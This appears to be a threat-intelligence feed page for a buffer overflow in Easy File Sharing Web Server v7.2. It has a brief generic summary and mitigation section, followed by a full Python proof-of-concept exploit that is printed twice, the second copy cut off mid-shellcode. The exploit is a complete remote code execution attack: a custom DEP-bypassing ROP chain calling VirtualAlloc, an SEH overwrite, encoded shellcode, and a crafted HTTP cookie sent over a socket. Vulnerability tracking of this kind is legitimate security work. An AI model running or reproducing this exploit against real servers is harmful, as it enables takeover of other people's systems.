Reconnecting to live updates…

Easy File Sharing Web Server v7.2 - Buffer Overflow

Severity: mediumType: exploit

AI Analysis

Technical Summary

The Easy File Sharing Web Server v7.2 suffers from a buffer overflow vulnerability. The available exploit code is written in Python, indicating a proof-of-concept or exploit demonstration exists. No affected versions beyond v7.2 are specified, and no vendor patch or advisory is referenced. The vulnerability could allow an attacker to overwrite memory, potentially leading to arbitrary code execution or denial of service, depending on exploitation specifics.

Potential Impact

Successful exploitation of this buffer overflow could lead to arbitrary code execution or denial of service on the affected server running Easy File Sharing Web Server v7.2. However, no active exploitation in the wild has been reported, and the exact impact depends on the attacker's ability to trigger the overflow.

Mitigation Recommendations

Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. In the absence of an official fix, consider disabling or restricting access to the Easy File Sharing Web Server v7.2 until a patch or mitigation is available.

Indicators of Compromise

exploit-code: # Exploit title: Easy File Sharing Web Server v7.2 - Buffer Overflow # Date: 16/10/2025 # Exploit Author: Donwor # X: @real_Donwor # Discord: Donwor # Website: https://github.com/D0nw0r # Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe # Version: Easy File Sharing Web Server v7.2 # Tested on: Windows 10,11 # # Notes: # - I wanted to re-do other PoCs because I did not want to use mona rop chain, so instead I built my own for practice and I believe it can help others. # - The ROP chain was VERY challenging to build, mainly because there were a lot of limimitations when moving data between for example EAX and ESI # - based on DEP SEH buffer overflow exploit by Knaps (https://www.exploit-db.com/exploits/38829/) # - bad chars: '\x00' and '\x3b' import struct, sys, socket host = sys.argv[1] port = 80 size = 5000 rop = struct.pack("<I", 0x1001ba81) # # MOV EAX,EBP # POP EDI # POP ESI # POP EBP # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0x41414141) # junk for pop edi rop += struct.pack("<I", 0x41414141) # junk for pop edi rop += struct.pack("<I", 0x41414141) # junk for ebp rop += struct.pack("<I", 0x1001db66) # : # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0xffffeff8) # pop esi to align eax, will point after the hybjks rop += struct.pack("<I", 0x10022f45) # # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0x41414141) # # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0x41414141) # # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x61c0a798) # XCHG EAX,EDI # RETN ) rop += struct.pack("<L", 0x1001d626) # : # XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # (RVA : 0x00021a3e) : # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} ## Save ESP on ESI and EDI rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN rop += struct.pack("<L", 0x1004D1FC) # VirtualAlloc Addr on IAT rop += struct.pack("<L", 0x1002248c) # deref VirtualAlloc : # MOV EAX,DWORD PTR [EAX] # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001a8e3) # put virtualalloc addr on stack # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x41414141) # junk pop ebx rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi(RVA : 0x00021a3e) : # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 4 bytes more (next arg) (RVA : 0x0001715d) : # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # # Virtual Alloc on stack # Esi now has "SRP" we need to fill it # EDI still points to orignal one (Virtual alloc) rop += struct.pack("<L", 0x1001f595) # Put SRP addr on eax MOV EAX,ESI # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # eax now points to x more (can be changed) rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001e80b) # This immedeately patches SRP and VirtualAlloc 1st arg! MOV DWORD PTR [ESI+8],EAX # MOV DWORD PTR [ESI+4],EAX # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi # Virtual alloc | SRP | Shellcode Addr # edi -> virtualalloc rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 12 bytes more (->dwsize) # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001c15d) # XOR EAX,EAX # RETN) # rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN rop += struct.pack("<L", 0xffffffff) # -1 rop += struct.pack("<L", 0x100231d1) # will turn eax into 1, second arg of virtualalloc NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}) # rop += struct.pack("<L", 0x1001a8e3) # patch arg # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x41414141) # junk pop ebx #VirtualAlloc | SRP | ShellcodeAddr | dwSize # edi -> virtualalloc rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 16 bytes more (->flAllocation Type) # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN rop += struct.pack("<I", 0xffffefff) # value to pop eax now rop += struct.pack("<L", 0x100231d1) # will turn eax into 1002 NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}) # rop += struct.pack("<I", 0x1001b7ca)# eax now 1000 # DEC EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001a8e3) # patch arg # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x41414141) # junk pop ebx #VirtualAlloc | SRP | ShellcodeAddr | dwSize | flAllocationType # edi -> virtualalloc rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 20 bytes more (->flProtect Type) # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN rop += struct.pack("<I", 0xffffffbf) # : -41 rop += struct.pack("<L", 0x100231d1) # will turn eax into 41 NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}) # rop += struct.pack("<I", 0x1001b7ca)# eax now 40 # DEC EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001a8e3) # patch arg # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x41414141) # junk pop ebx #VirtualAlloc | SRP | ShellcodeAddr | dwSize | flAllocationType | flProtect # edi -> virtualalloc rop += struct.pack("<L", 0x61c0a798) # # XCHG EAX,EDI # RETN rop += struct.pack("<L", 0x61c07ff8) # XCHG EAX,ESP # RETN # Just switch execution now, move the stack pointer to EDI (VirtualAlloc) sc = b"" sc += b"\x81\xc4\x24\xfa\xff\xff" # add esp , -1500 sc += b"\xbd\x04\xae\x2a\x98\xdb\xce\xd9\x74\x24\xf4\x5b" sc += b"\x31\xc9\xb1\x5e\x83\xeb\xfc\x31\x6b\x11\x03\x6b" sc += b"\x11\xe2\xf1\x52\xc2\x17\xf9\xaa\x13\x48\xc8\x78" sc += b"\x9a\x6d\x4e\xf6\xcf\x5d\x05\x5a\xfc\x16\x4b\x4f" sc += b"\x77\x5a\x43\x60\x30\xd1\xb5\x4f\xc1\xd7\x79\x03" sc += b"\x01\x79\x05\x5e\x56\x59\x34\x91\xab\x98\x71\x67" sc += b"\xc1\x75\x2f\xf3\x7b\x9a\x44\x41\x40\xcd\x5b\x96" sc += b"\x33\xb1\x23\x93\x84\x46\x9f\x9a\xd4\xf7\x94\xc5" sc += b"\xf4\x7c\xe2\xed\xf5\x51\x77\xc4\x82\x69\x3e\xe6" sc += b"\x95\x19\xf4\x83\x6b\xc8\xc5\x53\xc7\x35\xea\x59" sc += b"\x19\x71\xcc\x81\x6c\x89\x2f\x3f\x77\x4a\x52\x9b" sc += b"\xf2\x4d\xf4\x68\xa4\xa9\x05\xbc\x33\x39\x09\x09" sc += b"\x37\x65\x0d\x8c\x94\x1d\x29\x05\x1b\xf2\xb8\x5d" sc += b"\x38\xd6\xe1\x06\x21\x4f\x4f\xe8\x5e\x8f\x37\x55" sc += b"\xfb\xdb\xd5\x80\x7b\x24\x26\xad\x21\xb3\xeb\x60" sc += b"\xda\x43\x63\xf2\xa9\x71\x2c\xa8\x25\x3a\xa5\x76" sc += b"\xb1\x4b\xa1\x88\x6d\xf3\xa1\x76\x8e\x04\xe8\xbc" sc += b"\xda\x54\x82\x15\x63\x3f\x52\x99\xb6\xaa\x58\x0d" sc += b"\xf9\x83\x64\xc7\x91\xd1\x94\xd6\xda\x5f\x72\x88" sc += b"\x4c\x30\x2a\x69\x3d\xf0\x9a\x01\x57\xff\xc5\x32" sc += b"\x58\xd5\x6e\xd8\xb7\x80\xc7\x75\x21\x89\x93\xe4" sc += b"\xae\x07\xde\x27\x24\xa2\x1f\xe9\xcd\xc7\x33\x1e" sc += b"\xaa\x27\xcb\xdf\x5f\x28\xa1\xdb\xc9\x7f\x5d\xe6" sc += b"\x2c\xb7\xc2\x19\x1b\xcb\x04\xe5\xda\xfa\x7f\xd0" sc += b"\x48\x43\x17\x1d\x9d\x43\xe7\x4b\xf7\x43\x8f\x2b" sc += b"\xa3\x17\xaa\x33\x7e\x04\x67\xa6\x81\x7d\xd4\x61" sc += b"\xea\x83\x03\x45\xb5\x7c\x66\xd5\xb2\x83\xf5\xf2" sc += b"\x1a\xec\x05\x43\x9b\xec\x6f\x43\xcb\x84\x64\x6c" sc += b"\xe4\x64\x85\xa7\xad\xec\x0c\x26\x1f\x8c\x11\x63" sc += b"\xc1\x10\x12\x80\xda\xa3\x69\xe9\xdd\x43\x8e\xe3" sc += b"\xb9\x43\x8f\x0b\xbc\x78\x46\x32\xca\xbf\x5b\x01" sc += b"\xd5\x5d\x71\x7c\x7e\xf8\x10\x3d\xe3\xfb\xcf\x02" sc += b"\x1a\x78\xe5\xfa\xd9\x60\x8c\xff\xa6\x26\x7d\x72" sc += b"\xb6\xc2\x81\x21\xb7\xc6" padding = b"\x45" * 4 # 4 bytes of padding because of the alignment, the add eax,20 instructions will make it so stack points 4 bytes after rop += padding rop += sc rop += b"\x42" * (1244 - len(rop)) nseh = struct.pack("<I", 0x43434343) seh = struct.pack("<I", 0x10022877) # add esp, 1004; ret eax_offset = 4183 buf = b"A" * 2811 # rop chain start after add esp 1004 buf += rop buf += b"A" * (4059 - len(buf)) #nseh buf += nseh + seh buf += b"A" * (eax_offset - len(buf)) buf += struct.pack("<I", 0xffffffff) #" #make sure eax always trigger exception buf += b"A" * (size - len(buf)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host ,port)) httpreq = ( b"GET /changeuser.ghp HTTP/1.1\r\n" b"User-Agent: Mozilla/4.0\r\n" b"Host:" + host.encode() + b":" + str(port).encode() + b"\r\n" b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" b"Accept-Language: en-us\r\n" b"Accept-Encoding: gzip, deflate\r\n" b"Referer: http://" + host.encode() + b"/\r\n" b"Cookie: SESSIONID=6771; UserID=" + buf + b"; PassWD=;\r\n" b"Conection: Keep-Alive\r\n\r\n" ) # Send payload to the server try: if len(sys.argv) < 2: print("[!] Usage: python3 exploit.py <IP of Server>") sys.exit(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(httpreq) s.close() print("[+] Packet sent!") except: print("[!] Could not connect to server / Exploit failed") sys.exit(1) sys.exit(0)

Easy File Sharing Web Server v7.2 - Buffer Overflow

Severity: medium

Type: exploit

Easy File Sharing Web Server v7.2 - Buffer Overflow

Technical Summary

Potential Impact

Mitigation Recommendations

Indicators of Compromise

exploit-code: # Exploit title: Easy File Sharing Web Server v7.2 - Buffer Overflow # Date: 16/10/2025 # Exploit Author: Donwor # X: @real_Donwor # Discord: Donwor # Website: https://github.com/D0nw0r # Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe # Version: Easy File Sharing Web Server v7.2 # Tested on: Windows 10,11 # # Notes: # - I wanted to re-do other PoCs because I did not want to use mona rop chain, so instead I built my own for practice and I believe it can help others. # - The ROP chain was VERY challenging to build, mainly because there were a lot of limimitations when moving data between for example EAX and ESI # - based on DEP SEH buffer overflow exploit by Knaps (https://www.exploit-db.com/exploits/38829/) # - bad chars: '\x00' and '\x3b' import struct, sys, socket host = sys.argv[1] port = 80 size = 5000 rop = struct.pack("<I", 0x1001ba81) # # MOV EAX,EBP # POP EDI # POP ESI # POP EBP # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0x41414141) # junk for pop edi rop += struct.pack("<I", 0x41414141) # junk for pop edi rop += struct.pack("<I", 0x41414141) # junk for ebp rop += struct.pack("<I", 0x1001db66) # : # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0xffffeff8) # pop esi to align eax, will point after the hybjks rop += struct.pack("<I", 0x10022f45) # # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0x41414141) # # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0x41414141) # # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x61c0a798) # XCHG EAX,EDI # RETN ) rop += struct.pack("<L", 0x1001d626) # : # XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # (RVA : 0x00021a3e) : # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} ## Save ESP on ESI and EDI rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN rop += struct.pack("<L", 0x1004D1FC) # VirtualAlloc Addr on IAT rop += struct.pack("<L", 0x1002248c) # deref VirtualAlloc : # MOV EAX,DWORD PTR [EAX] # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001a8e3) # put virtualalloc addr on stack # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x41414141) # junk pop ebx rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi(RVA : 0x00021a3e) : # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 4 bytes more (next arg) (RVA : 0x0001715d) : # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # # Virtual Alloc on stack # Esi now has "SRP" we need to fill it # EDI still points to orignal one (Virtual alloc) rop += struct.pack("<L", 0x1001f595) # Put SRP addr on eax MOV EAX,ESI # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # eax now points to x more (can be changed) rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001e80b) # This immedeately patches SRP and VirtualAlloc 1st arg! MOV DWORD PTR [ESI+8],EAX # MOV DWORD PTR [ESI+4],EAX # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi # Virtual alloc | SRP | Shellcode Addr # edi -> virtualalloc rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 12 bytes more (->dwsize) # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001c15d) # XOR EAX,EAX # RETN) # rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN rop += struct.pack("<L", 0xffffffff) # -1 rop += struct.pack("<L", 0x100231d1) # will turn eax into 1, second arg of virtualalloc NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}) # rop += struct.pack("<L", 0x1001a8e3) # patch arg # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x41414141) # junk pop ebx #VirtualAlloc | SRP | ShellcodeAddr | dwSize # edi -> virtualalloc rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 16 bytes more (->flAllocation Type) # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN rop += struct.pack("<I", 0xffffefff) # value to pop eax now rop += struct.pack("<L", 0x100231d1) # will turn eax into 1002 NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}) # rop += struct.pack("<I", 0x1001b7ca)# eax now 1000 # DEC EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001a8e3) # patch arg # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x41414141) # junk pop ebx #VirtualAlloc | SRP | ShellcodeAddr | dwSize | flAllocationType # edi -> virtualalloc rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 20 bytes more (->flProtect Type) # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN rop += struct.pack("<I", 0xffffffbf) # : -41 rop += struct.pack("<L", 0x100231d1) # will turn eax into 41 NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}) # rop += struct.pack("<I", 0x1001b7ca)# eax now 40 # DEC EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001a8e3) # patch arg # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x41414141) # junk pop ebx #VirtualAlloc | SRP | ShellcodeAddr | dwSize | flAllocationType | flProtect # edi -> virtualalloc rop += struct.pack("<L", 0x61c0a798) # # XCHG EAX,EDI # RETN rop += struct.pack("<L", 0x61c07ff8) # XCHG EAX,ESP # RETN # Just switch execution now, move the stack pointer to EDI (VirtualAlloc) sc = b"" sc += b"\x81\xc4\x24\xfa\xff\xff" # add esp , -1500 sc += b"\xbd\x04\xae\x2a\x98\xdb\xce\xd9\x74\x24\xf4\x5b" sc += b"\x31\xc9\xb1\x5e\x83\xeb\xfc\x31\x6b\x11\x03\x6b" sc += b"\x11\xe2\xf1\x52\xc2\x17\xf9\xaa\x13\x48\xc8\x78" sc += b"\x9a\x6d\x4e\xf6\xcf\x5d\x05\x5a\xfc\x16\x4b\x4f" sc += b"\x77\x5a\x43\x60\x30\xd1\xb5\x4f\xc1\xd7\x79\x03" sc += b"\x01\x79\x05\x5e\x56\x59\x34\x91\xab\x98\x71\x67" sc += b"\xc1\x75\x2f\xf3\x7b\x9a\x44\x41\x40\xcd\x5b\x96" sc += b"\x33\xb1\x23\x93\x84\x46\x9f\x9a\xd4\xf7\x94\xc5" sc += 